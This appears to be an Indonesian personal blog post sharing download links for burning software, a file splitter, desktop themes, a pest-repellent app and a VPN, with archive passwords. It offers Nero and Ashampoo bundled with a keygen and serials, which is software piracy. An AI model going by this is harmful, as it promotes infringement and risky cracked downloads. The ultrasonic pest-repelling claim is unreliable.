Sekarang, dengan fitur lebih banyak daripada sebelumnya, ini perangkat lunak yang kuat dapat mengubah foto digital ke slide animasi profesional, backup semua data Anda yang berharga, mengelola atau cari media file, edit video atau foto, membuat DVD (termasuk menu), dan aliran file Anda melalui server media, dan kompres file untuk mengambil pergi.
Nero 7 Premium mendukung teknologi Blu-ray dan memberi Anda kemampuan untuk membakar data ke BD-RE dan BD-R (Blu-ray) media, yang memungkinkan Anda untuk menyimpan data dalam jumlah besar (25-50 GB) ke satu disk.

nah untuk mendapatkanya kamu bisa klik  di bawah ini,....
dan sudah di lengkapi dengan keygen nya teman2,jangan kuatir.........
1.nero burning001
2.nero burning 002 

jangan lupa untuk menggabungkan file nya kamu harus pakai hj-split,untuk pasword nya budywonk.......salam dari saya semoga berhasil.

ASHAMPOO BURNING STUDIO 2010+SERIAL

Ashampoo burning studio merupakan salah satu program barning yang sangat populer,saat ini saya share disini yg versi 2010....praktis dan sangat mudah di gunakan



.Fitur-fitur di Ashampoo Burning Studio 2010

  • Burning dan Update data di CD/DVD, termasuk Blu-Ray disc
  • Backup data ke dalam sebuah disk atau ke banyak disk dan me-restore kembali dengan langkah yang mudah
  • Rip audio, dalam berbagai format.
  • Burning film (video) kedalam format VCD, SVCD atau DVD. KOnversi akan otomatis dilakukan.
  • Movie Editor dengan DVD Authoring, yaitu kemampuan untuk mengedit video sebelum di buat dalam format DVD
  • Membuat Slideshow DVD, dengan judul, transisi dan background
  • Copy CD, DVD dan Blu-Ray disc
  • Membuat dan burning disc Images, seperti file dalam format ISO, CUE/BIN, dan format Ashampoo sendiri
  • Menghapus data dari keping CD/DVD Rewritable
  • Membuat cover dan Label CD/DVD
  • Fitur bunring dengan fungsi dan pengaturan lebih lanjut lainnya


ingin miliki sofeware nya ga usah kuatir teman2 akan aku berikan lengkap dengan serial numbernya,udah ga sabar ya ingin memilikinya.....silah kan anda klik disini...,oke,semoga bermanfaat...........

HJ-SPLIT

HJ-split adalah salah satu sofeware yg gunaya untuk memotong atau menggabungkan file....maaf kl baru sekarang aku share,cz aku lupa,,he2,......ini lah tampilan sofeware hj-split



file nya sangat kecil kok temen2....dan amplikasi ini ga perlu kamu instal tinggal klik aja nanti akan nampak seperti gambar di atas,cara kerja sofeware ini cukup gampang n cukup praktis,untuk memotong file atau memecah kamu pilih tombol split,kemudian disitu kamu nanti masuk untuk pilihan input fle dan output file,yaitu untuk mengatur file yg akan kita potong,input untuk mengambil file atau memilih kemudian output nya untuk menaruh hasil file yg kita potong td,sesuai selera kita untuk di tempatkan dimana.untuk menyambung  atau menggabungkan kamu pilih tombol join,cara kerjanya sama temen2....kayak split td atur tombol input-outputnya kemudian tekan ok nanti otomatis sofeware ini akan bekerja......nah udh paham kan temen2,gampang kok asal kita niat belajar.....untuk sofeware nya kamu bisa sedot disini ,semoga berhasil...

AMPLIKASI PENGUSIR NYAMUK

kali ini aku per kenal kan sofeware yg unik teman2,kamu mau tau sofeware apakah gerangan..........yaitu amplikasi yg gunaya untuk mengusir nyamuk dan tikus temen2,menakjubkan bukan,ini kayak nya cocok buat kamu kamu yg malas bersih bersih nih.........gkkgkkgkgkgkgkgkgkkg,ga bercanda aza kok soooob....ya siapa tau buat temen2 yg mau nyedot dan tertarik amplikasi ini silahkan di dowload di bawah,berikut tampilan sofeware yg unik ini












Prinsip kerja dari aplikasi ini yaitu memancarkan sinyal ultrasonik yang tidak disukai nyamuk dan tikus, yaitu antara 20.000 Hz sampai 65.000 Hz melalui speaker internal di Komputer,nah,,,buat kamu yg tertarik dan ingin mencobanya,silahkan ambil sendiri disini,kl kamarku sih ga ada nyamuk nya sobat,cz aku bersihan siii.......he2,jangan lupa untuk pasword budywonk,yg selalu berbaik hati untuk anda,he2...ok. salam bloger.


klik dibawah untuk download
pasword  : budywonk


Photobucket

Real Desktop v.1.67 | Tampilan Detskop 3D keren



Salah satu pilihan software untuk memperindah tampilan detskop komputer, nama softwarenya adalah Real Detskop,. Real Detskop membuat tampilan detskop menjadi lebih bagus lebih indah dan lebih enak dilihat, dengan tampilan 3D akan membuat seakan-akan detskop komputer adalah sebuah ruangan yang indah.nikmati tampilan sentuhan 3d ini untuk layar anda,biar kagak bosen..........cocok untuk windows 2000/xp/vista dan windows 7 kamu......



lihat sentuhan 3d nya anda pasti penasaran bukan,silahkan di coba..........untuk mendapatkan nya silahkan anda klik disini tunggu apa lagi mumpung ada sobat......he2...untuk paswordnya jangan lupa,pokoknya harus selalu ingat,budywonk ok,semoga berhasil....

SECURITY KISS TUNNEL

SECURITY KISS TUNNEL


Apakah Anda telah diblokir oleh Internet Provider?

Apakah ingin memastikan prifasi internet?

Apakah Anda ingin melindungi transaksi Anda?

Online TV dilarang di lokasi Anda?

VoIP diblokir atau terdistorsi?








Gunakan Terowongan SecurityKISS











terowongan securitykiss pengalihan semua lalu lintas online anda melalui terowongan bisa di tembus ke getway keamanan kami.


nah udah paham kan kira2 apa guna security kiss tunnel ini,yaitu untuk menembus batas keamanan yg di blokir,mungkin dari suatu kebijakan dari negara atau suatu tempat tertentu,dengan menggunakan security kiss ini,kita bisa bebas menembus apa yg ada disitu,di gambar yg paling atas adalah contoh gambar .....setelah nanti kita instal sofeware    nya...nah kalau temen2 ingin miliki sofeware nya cukup klik disini,Demikian lah pengalaman dari saya semoga ber manfaat.

NB:untuk windows7,cara menggunakan setelah di instal,dengan cara klik kanan pada program,kemudian klik run as administrator,bila terjdi limit,anda bisa coba dengan mengatur change server,pada kotak bawah sebelah kanan,sebelah gambar pencil,demikian tambahan dari saya,semoga bermanfaat.
   








download dibawah ini
Photobucketsecurity kiss tunnel update baru



pasword : budywonk
klik skip ad untuk mendonload pada pojok kanan atas,terimakasih.
 
bila ada kejanggalan di blog ini,anda bisa tulis di komentar atau di catbox,jangan sungkan,blog ini di buat untuk persahabatan.maju terus bloger indonesia!!!